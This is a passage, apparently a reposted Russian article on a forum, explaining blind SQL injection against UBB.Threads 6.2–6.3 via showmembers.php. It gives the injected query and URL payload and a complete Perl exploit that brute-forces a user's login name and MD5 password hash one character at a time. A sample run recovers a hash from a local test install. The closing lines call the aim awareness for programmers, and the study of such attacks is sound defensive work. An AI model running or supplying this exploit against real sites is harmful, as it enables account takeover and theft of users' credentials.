SELECT COUNT(*) FROM w3t_Users WHERE U_Approved='yes' AND U_Username LIKE '12345' AND ascii(lower(substring(U_Password,1,1)))=50 /*%'

И данный запрос вернет информацию о пользователе имя которого 12345 если код первого символа его пароля равняется 50 т.е. если первый символ его пароля 2.

Точнее сказать что этот запрос возвращает количество строк совпадающих с условием, а далее в зависимости от этого количества, производятся следующие запросы к БД выбирающие информацию о данных пользователях. Опубликованный эксплоит как раз и использовал обьединение через UNION в этих последующих запросах для вывода хешей паролей пользователей. В нашем же случае нам вполне достаточно этого первого запроса к БД получающего количество строк. Ведь если будет возвращаться нулевое количество то и дальнейшие запросы выполняться не будут и соответственно не будет никакого вывода. А наличие или отсутствие вывода и является единственным необходимым нам ответом скрипта на основании которого мы и проведем перебор.

Одна особенность данного форума состоит в том что в U_Username хранится имя пользователя которое отображается при добавлении сообщений и в списке пользователей, но для авторизации на форуме используется U_LoginName которое не отображается и которое нам также придется получить для чего мы воспользуемся уже известной функцией CONCAT. И запрос принимает вид:

http://127.0.0.1/UBB/ubbthreads/showmembers.php?Cat=&page=1&like=12345' AND ascii(lower(substring(CONCAT(U_LoginName,CHAR(58), U_Password),1,1)))=50 /*

Функция char(58) соответствует символу : и предназначена для того чтобы при получении отделить логин от хэша пароля.

Итак теперь осталось только определить строку которая будет присутствовать в ответе скрипта при правильном выполнении запроса и все данные необходимые для перебора будут у нас в руках.

После просмотра html кода легко определить что при присутствии вывода информации о пользователе (т.е. при выполнении запроса) в коде будут присутствовать строки типа: <td class="lighttable"> Именно по этим строкам мы и будем определять выполнение условия в запросе.

Таким образом все данные необходимые для перебора у нас имеются и можно написать эксплоит который будет перебирать символы и выводить полученный результат. Код данного сплоита таков:
--- start r57ubb.pl ---

#!/usr/bin/perl

use LWP::UserAgent;

# UBB.Threads 6.2.* - 6.3.* exploit
# with one char brute technique
# by 1dt.w0lf // r57

$path = $ARGV[0];
$username = $ARGV[1];

$s_num = 1;
$n=0;
$|++;

if (@ARGV < 2) { &usage; }

print "Please wait...\r\n";
print "[";

while(1)
{
# начинаем перебор с полного диапазона
&found(0,122);
# если возвращенный код 0 значит дошли до конца
# строки и выводим полученный результат
if ($char=="0")
{
print "]\r\n\r\n";
# разделяем полученную строку на логин и пароль
($res1,$res2)=split(":",$allchar); #
print "------------------x REPORT x-------------------\r\n";
print " Username: $username\r\n";
print " Login Name: $res1\r\n";
print " Password Hash: $res2\r\n";
print "------------------x REPORT x-------------------\r\n";
print "total requests: $n\r\n";
exit();
}
else
{
# преобразуем полученный код в символ и добавляем его к строке результата
print "|";
$allchar .= chr($char);
}
# увеличиваем позицию символа на единицу и продолжаем перебор
$s_num++;
}



sub found($$)
{
# определяем переданный диапазон
my $fmin = $_[0];
my $fmax = $_[1];
# если диапазон менее 5 то переходим к перебору
if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char; }
# определяем центр диапазона
$r = int($fmax - ($fmax-$fmin)/2);
# делаем условие
$check = ">$r";
# и проверяем условие, в зависимости от результата
# рекурсивно вызываем функцию с новым диапазоном
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r+1); }
}

sub crack($$)
{
# определяем переданный диапазон
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
# и проходим по каждому значению из диапазона
while ($i<$cmax)
{
# делаем условие
$crcheck = "=$i";
# проверяем его
if ( &check($crcheck) ) { return $i; }
$i++;
}
return;
}

sub check($)
{
# увеличиваем количество запросов
$n++;
# определяем условие
$ccheck = $_[0];
# создаем http запрос к серверу
$http_query = $path."?Cat=&page=1&like=".$username."'
AND ascii(substring(CONCAT(U_LoginName,CHAR(58),U_Pass word),".$s_num.",1))".$ccheck." /*";

# Если вы хотите видеть все запросы отправляемые к скрипту
# то расскоментируйте следующую строку
# print "\r\n $http_query \r\n";

$mcb_reguest = LWP::UserAgent->new() or die;
# получаем ответ сервера
$res = $mcb_reguest->post($http_query);
@results = $res->content;
# проверяем ответ сервера на наличие строки
foreach $result(@results)
{
if ($result =~ /<td class=\"lighttable\">/) { return 1; }
}
return 0;
}

sub usage
{
print "================================================= ========\r\n";
print " UBB.Threads 6.2.*-6.3.* one char bruteforce exploit\r\n";
print " For all MySQL versions! Don't need UNION support!\r\n";
print "================================================= ========\r\n";
print " Usage: $0 [path/to/showmembers.php] [username]\r\n";
print " e.g. : $0 http://127.0.0.1/showmembers.php admin\r\n";
print "================================================= ========\r\n";
exit();
}

--- end r57ubb.pl ---
Итак пусть форум крутится на mysql версии 3.23.58 и на форуме существует пользователь имя которого "im_not_admin"
Попробуем получить его логин и пароль.
C:\>r57ubb.pl http://127.0.0.1/ubbthreads/showmembers.php im_not_admin
Please wait...
[|||||||||||||||||||||||||||||||||||||||||||]

------------------x REPORT x-------------------
Username: im_not_admin
Login Name: real_admin
Password Hash: 5f4dcc3b5aa765d61d8327deb882cf99
------------------x REPORT x-------------------
num requests: 373

C:\>

Как видно нам это удалось и общее количество запросов понадобившихся для перебора составило 373 запроса. Таким образом для перебора строки из 43 символов (32 символа хеш пароля + 10 символов имя юзера + 1 символ разделитель) требуется примерно 350-400 запросов и на диалапе перебор занимает примерно секунд 20-30. Имхо совсем неплохо
В приведенном коде перебирается диапазон символов с кодами от 0 до 122 и не используется функция lower() так как в логине пользователя могут использоваться символы в верхнем регистре. Можно еще ускорить перебор уменьшив диапазон перебора после получения символа разделителя ( так как пароль в данном форуме шифруется md5 и соответственно в хеше будут только символы в нижнем регистре и цифры. Но реализацию этого я оставлю для вас...

__ OUTRO __

Методы описанные в данной статье на примере баз MySQL с тем же успехом могут применяться и на MSSQL, единственное, что для этого потребуется это немного видоизменить запросы. В MSSQL включена поддержка как обьединения через UNION так и поддержка подзапросов, таким образом на данной базе посимвольный перебор трудностей не вызывает.

Целью данной статьи было показать как возможные взломщики могут получить информацию из баз данных пользуясь внедрением sql кода в разнообразные запросы при условиях отсутствия вывода полученного результата. Надеюсь эта статья подтолкнет програмистов пишущих софт, использующий в своей работе БД, тщательнее относиться к проверке данных получаемых от пользователя перед помещением этих данных в запрос к базе данных, вне зависимости от того какого рода этот запрос.

статья старая, взята с inattack.ru
вот сцылка на саму статью
http://inattack.ru/article/290.html

обясните дураку что означает